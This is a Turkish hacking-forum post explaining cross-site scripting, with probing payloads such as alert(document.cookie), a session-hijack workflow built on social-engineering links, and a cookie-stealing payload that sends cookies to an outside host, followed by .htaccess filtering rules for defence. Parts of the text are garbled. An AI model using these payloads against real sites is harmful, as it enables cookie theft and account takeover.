Hacked The BY
Mesaj Sayısı : 30
Yaş : 29
Nerden : Anakra
rep puanı : 310
Kayıt tarihi : 03/04/10
 |  Konu: XSS (Cross Site Sc.) Security  3rd Nisan 2010, 19:14 | |
| XSS (Cross Site scripting)
Cross Site scripting Nedir?
Kullanıcı bilgilerini ele geçirmek ve kullanıcı düzeneğini bozmak amacıyla “Attacker” tarafından HTML kodlarıyla tarayıcı üzerinden güvenlik zafiyeti oluşturmaktadır. “XSS” 2002 Yılında Trust and Barney dökümanında ilk defa dile getirilmiştir.
Açık ve Kullanım?
Cross Site scripting genel anlamda kullanıcı bilgilerine ulaşma amacı sağladığından ilk oluşum aşamasından sonra değişik teorilere ve geniş bir alana yayılmıştır. İstemci tarafına yollanan ve açıkların tüzelliğini kullanmak amacıyla oluşturulan kodlamalar “Mail Hacking, Web Hacking” alanlarına geniş manada yayılmış düzeneği bozma haline gelmiştir.
Attacker’ler bunu fırsat bilerek kendi düzeneklerini kurup kullanıcı bilgilerine ulaşmak için “Sniffer” hazırlamaya başlamış ve kullanımı dahada kolaylaştırma yoluna gitmişlerdir.
Hata:
http://www.site.com/ex.php?isim=excaliburURL değişkeninde form Local sayfasına hiçbir etki bırakmadan yazdırılıyorsa açık var demektir.
http://www.site.com/dz.php?isim=alert(document·cookie)
Attacker bu kodlamalar üzerinden Javascript kodları çalıştırabilir kullanıcıları “Cookie” bilgilerini elde edebilir.Açığın oluştuğu bölümler genellikle script içerisinde “Post” ve “Get”
metotları bölümündedir.”isim?=” gibi arama bölümlerine XSS kodlarını enjekte ederek deneyebilirsiniz.
Oluşum:
- XSS Tabanlı sniffer hazırlanır.
- Hazırlanan Sniffer üzerinden bilgi çekmek amaçlı link dağıtımı
- Kullanıcıya ulaştırma ve “Cookie” Bilgisini elde etmek
- Alınan bilgiyle giriş.
- Hacking.
Örnek Kodlar:
Javascript düzeneği ile bulunduğundan dolayı belirli javascript kodlarını kullanabiliriz:
“>alert
“>alert(“excalibur”)
“>alert(document·cookie)
(Browser XSS) javascript*alert ZararliKod*document·cookie);
Attacker Enjekte:
Saldırgan XSS hatalarında genelde kullanıcının dikkatini çekmek amaçlı “Sosyal Mühendislik” tabirli linkler kullanır.Kullanılan linklerde XSS kodlarının bazı enjekte şekilleri şunlardır:
-Sniffer
javascript:document·cookie+=";document.loc ation=’http://site.com/s.php?’+document·cookie";
- Flash
getURL()
XSS Saldırılarına kodlamalar içinde veya link üzerinde HEX’lenmiş biçimde de karşılaşabilirsiniz.Kullanılan kodları saldırgan HEX Editör ile Kriptolayarak gizleyebilir.
Browser XSS:
Browser XSS script üzerinden bilgi alma amaçlı değildir. Attacker’ler tarafından pek yaygın değildir çünkü kullanım esnası biraz farklıdır.
Browser üzerinden bulunan “URL’yi” silerek “javascirpt*alert ZararliKod*document·cookie);” yazdığımızda o anki Web üzerinde bulunan sitenin kullanıcı bilgilerini Alert (Uyarı) mesaj olarak alabilirsiniz.Kodlama alanında Sniffer oluşturulurken URL Sıfırlama mantığı yapılamadığından yaygın değildir ve kullanımı tabi değildir.
Yalnız getURL() Flash gibi bir düzenekle bunu gerçekleştirmek mantıklı olabilir. Örneğin:
getURL("javascript*alert ZararliKod*document·cookie)")
Flash içerisinde URL çağırma ile aynı URL üzerinden sıfırlama yaparak ulaşılabilir şuan için aklıma gelen en büyük tehlikedir. Çünkü Browser XSS script hatasından kaynaklanmamakta Browser Javascript özelliğinden faydalanmaktadır.
XSS Korunma:
Server üzerinden REQUEST Metodu
HTML Purifer gibi olan “PHPIDS”
“.htaccess” ile korunma
“.htaccess” ile Korunma Örnek:
1. RewriteEngine On
2. RewriteCond %{QUERY_STRING} base64_encode.*\\\\\\\\(.*\\\\\\\\) [OR]
3. RewriteCond %{QUERY_STRING} (\\\\\\\\<|<).*script.*(\\\\\\\\>|>) [NC,OR]
4. RewriteCond %{QUERY_STRING} GLOBALS(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2}) [OR]
5. RewriteCond %{QUERY_STRING} _REQUEST(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2})
6. RewriteRule ^(.*)$ index.php [F,L]
Bu şekilde XSS Saldırısı olan bölümlere Hata Mesajı vererek engelleyecektir. | |
|
